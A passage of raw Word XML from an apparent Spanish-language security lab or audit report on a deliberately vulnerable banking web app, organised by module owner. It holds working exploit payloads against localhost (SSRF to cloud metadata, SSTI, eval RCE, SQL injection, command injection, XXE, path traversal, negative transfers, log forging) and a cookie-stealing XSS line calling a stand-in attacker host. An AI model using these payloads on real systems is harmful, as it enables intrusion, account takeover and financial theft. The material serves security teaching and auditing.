        <w:t># SSRF: alcanzar metadatos internos / servicios de la red interna</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST http://localhost:5000/api/admin/fetch-avatar -H "Authorization: Bearer &lt;T&gt;" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" -d '{"avatar_url":"http://169.254.169.254/latest/meta-data/"}'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># SSTI -&gt; RCE vía plantilla Jinja2 del cliente</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST http://localhost:5000/api/admin/preview-email -H "Authorization: Bearer &lt;T&gt;" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" -d '{"template":"{{ 7*7 }}"}'   # devuelve 49</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2. Explotación de software en clientes (XSS almacenado/reflejado)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AdminPanel.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inserta resultados de búsqueda con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dangerouslySetInnerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y lee </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>?notes=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de la URL hacia otro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dangerouslySetInnerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>http://localhost:3000/...?notes=&lt;img src=x onerror=alert(document.domain)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Un usuario con nombre </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror=...&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dispara XSS al buscarlo. Combinado con el Módulo 1 (token en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>), permite robo de sesión del administrador.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3. Alteración de entrada y detección</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Backdoor de contraseña maestra:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>POST /api/admin/master-login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> concede acceso con</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"MasterAdmin@2024!"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> escrito en el código.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Autorización por `assert`:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sensitive-action</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> usa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>assert current_user.role=='admin'</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">que se desactiva con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>python -O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (control anulado).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>RCE directo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>calculate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run-script</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>format-data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>import-session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pickle.loads</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST http://localhost:5000/api/admin/calculate -H "Authorization: Bearer &lt;T&gt;" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" -d '{"expression":"__import__(\"os\").popen(\"id\").read()"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Módulo 3 — Operaciones · Responsable: Laura Alpízar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Archivos: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>backend/routes/transaction_routes.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, endpoints de operación en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>admin_routes.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>frontend/src/components/TransactionList.js</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1. Explotación de software de servidores</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>1.a Inyección SQL en historial y búsqueda (OWASP A03)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET /api/transactions?user_id=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/search?description=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> concatenan en SQL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Leer transacciones de cualquier usuario / exfiltrar con UNION</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s "http://localhost:5000/api/transactions?user_id=1%20OR%201=1" -H "Authorization: Bearer &lt;T&gt;"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s "http://localhost:5000/api/transactions/search?description=x%27%20UNION%20SELECT%20username,password_hash,3,4,5,6,7,8%20FROM%20user--%20" -H "Authorization: Bearer &lt;T&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>1.b Command Injection y XXE (OWASP A03/A05)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># generate-report arma un comando de shell con los parámetros</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST http://localhost:5000/api/admin/generate-report -H "Authorization: Bearer &lt;T&gt;" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" -d '{"report_type":"x; id #","date_range":"today"}'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># XXE en import-data (lee archivos del servidor)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST http://localhost:5000/api/admin/import-data -H "Authorization: Bearer &lt;T&gt;" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Content-Type: application/xml" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  --data '&lt;?xml version="1.0"?&gt;&lt;!DOCTYPE r [&lt;!ENTITY x SYSTEM "file:///etc/passwd"&gt;]&gt;&lt;root&gt;&lt;transaction&gt;&lt;sender&gt;&amp;x;&lt;/sender&gt;&lt;/transaction&gt;&lt;/root&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2. Explotación de software en clientes — XSS almacenado en el recibo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET /api/transactions/&lt;id&gt;/receipt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> devuelve HTML con la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>descripción sin escapar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sin autenticación</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Una transferencia con descripción </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;script&gt;fetch('https://atacante/'+document.cookie)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ejecuta el script cuando la víctima (o cualquiera, el endpoint es público) abre el recibo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3. Alteración de entrada y detección</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Monto negativo / sin saldo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>transfer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> valida el saldo *después* de aceptar el monto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">y no exige monto positivo; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>quickpay</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>split-bill</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> no validan nada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST http://localhost:5000/api/transfer -H "Authorization: Bearer &lt;T&gt;" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" -d '{"to_user_id":1,"amount":-500}'   # roba saldo al receptor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Débito de cuenta ajena:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>split-bill</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> acepta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>from_user_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> del cliente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST http://localhost:5000/api/split-bill -H "Authorization: Bearer &lt;T&gt;" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" -d '{"from_user_id":2,"to_user_id":1,"amount":300}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CSRF:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>quickpay</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> usa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cookie_auth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con la cookie no-SameSite; un formulario en un sitio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">externo que haga POST a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/api/quickpay</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mueve dinero con la sesión de la víctima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Módulo 4 — Auditoría y Logs · Responsable: Melany Bustos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Archivos: endpoints de auditoría/logs en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>admin_routes.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>backend/app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docker-compose.yml</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1. Explotación de software de servidores</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Fuga de secretos:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET /api/admin/dashboard-data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> devuelve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>api_key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>hardcoded; el archivo contiene además claves AWS/Stripe/GitHub/SendGrid y la contraseña   de BD en texto plano.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Path traversal en el visor de logs:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET /api/admin/view-log?file=../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>lee archivos arbitrarios del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2. Explotación de software en clientes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>view-log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> muestra contenido crudo de archivos; si un log contiene HTML inyectado por un atacante (ver 3), el panel que lo renderice puede ejecutar ese contenido. El modo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>debug=True</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de Flask expone además la consola interactiva de Werkzeug ante un error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3. Alteración de entrada y detección — Audit Poisoning (OWASP A09, CWE-117)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>POST /api/admin/audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> registra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>action</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>details</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> del cliente sin validar, y los interpola en el mensaje de log:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="216"/>
        <w:shd w:val="clear" w:fill="F2F3F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST http://localhost:5000/api/admin/audit -H "Authorization: Bearer &lt;T&gt;" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d '{"action":"login","details":"ok\nAUDIT: User admin performed action: delete_all - Details: SUCCESS"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Los </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B03060"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inyectan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>líneas de auditoría falsas</w:t>
      </w:r>
      <w:r>
